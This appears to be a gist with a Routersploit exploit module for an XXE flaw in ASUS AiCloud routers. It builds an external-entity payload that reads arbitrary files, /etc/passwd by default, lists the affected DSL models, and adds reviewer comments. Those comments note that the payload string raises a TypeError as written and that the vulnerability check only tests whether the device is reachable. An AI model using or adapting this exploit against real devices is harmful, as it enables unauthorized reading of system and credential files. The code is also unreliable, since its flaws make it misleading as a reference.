
@paralax
Created August 14, 2018 18:22
ASUS Router AiCloud XXE - Routersploit module
import random
import string
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
    """Routersploit module for the XXE file-read flaw in the ASUS AiCloud service.

    The module sends one request with the non-standard HTTP method
    ``UPDATEACCOUNT`` to ``/``. Its XML body declares an external entity that
    points at ``file://<filename>`` and references it inside ``<username>``.
    It then fetches ``/smb/css/setting.html`` and returns that page's text.

    Detection note: the request this code builds is distinctive on the wire.
    It uses the ``UPDATEACCOUNT`` method and carries a body with a
    ``<!DOCTYPE`` that declares a ``SYSTEM`` entity. Both are visible to an
    HTTP proxy or IDS placed in front of the device.

    NOTE(review): leading indentation was lost on the page this listing came
    from. The nesting below is a reconstruction; confirm it against the
    original file before relying on the control flow.
    """
    __info__ = {
        "name": "ASUS Router AiCloud XXE",
        "description": "Module exploits remote XXE flaw in ASUS device AiCloud service. "
                       "If the target is vulnerable, arbitrary files can be read.",
        "authors": (
            "@jnazario", # routersploit module
        ),
        "references": (
            "https://www.securityartwork.es/2018/01/25/some-vulnerability-in-asus-routers/",
        ),
        # Model names the author lists as affected; this module does not
        # fingerprint the model at runtime.
        "devices": (
            'DSL-AC51',
            'DSL-AC52U',
            'DSL-AC55U',
            'DSL-N55U C1',
            'DSL-N55U D1',
            'DSL-AC56U',
            'DSL-N10_C1',
            'DSL-N12U C1',
            'DSL-N12E C1',
            'DSL-N14U',
            'DSL-N14U-B1',
            'DSL-N16',
            'DSL-N16U',
            'DSL-N17U',
            'DSL-N66U',
            'DSL-AC750'
        )
    }
    # Module options exposed to the routersploit console.
    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(449, "Target HTTP port")
    filename = OptString("/etc/passwd", "File to read from the filesystem")
    def run(self):
        """Send the XXE request and return the text of the follow-up page.

        Returns:
            ``''`` when the first request yields no response; otherwise the
            ``.text`` of whichever response is current at the point of return.
            Returns ``None`` implicitly when ``check()`` fails.
        """
        if self.check():
            # check() only confirms that the settings page answers 200, so
            # this message reflects reachability, not a confirmed XXE.
            print_success("Target appears to be vulnerable")
            def randomstring():
                # 10-20 random characters drawn from string.hexdigits.
                return ''.join([ random.choice(string.hexdigits) for _ in range(random.randint(10,20))])
            # Random name used for the XML entity declared in the payload.
            identifier = randomstring()
            # NOTE(review): `%` binds tighter than `+`, so the format tuple is
            # applied only to the final literal, which has no placeholders.
            # As written this expression raises TypeError ("not all arguments
            # converted during string formatting") before any request is sent.
            payload = '<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>' +\
                '<!DOCTYPE foo [<!ENTITY %s SYSTEM "file://%s"> ]>' +\
                '<content><id>1</id>' +\
                '<username>TEST5&%s;</username>' +\
                '<password>test</password>' +\
                '<type>aicloud</type>' +\
                '<permission></permission></content>' % (identifier, self.filename, identifier)
            response = self.http_request(
                method='UPDATEACCOUNT',
                path='/',
                data=payload
            )
            if response is None:
                print_error("Exploit failed")
                return ''
            if response.status_code == 200:
                # Second request reads the page where the entity content is
                # expected to appear (presumably; verify against the reference).
                response = self.http_request(method='GET',
                                             path='/smb/css/setting.html')
                # NOTE(review): unlike the first request, this response is not
                # checked for None before `.text` is read.
                return response.text
            # Non-200 reply to the first request: its body is returned as-is.
            return response.text
        else:
            print_error("Target is not vulnerable")
    @mute
    def check(self):
        """Return True when ``/smb/css/setting.html`` answers with HTTP 200.

        This is a reachability probe only. It sends no XML and does not test
        entity resolution, so True does not establish that the device is
        vulnerable and False does not establish that it is patched.
        """
        response = self.http_request(method='GET',
                                     path='/smb/css/setting.html')
        if response is None:
            return False
        if response.status_code == 200:
            return True
        return False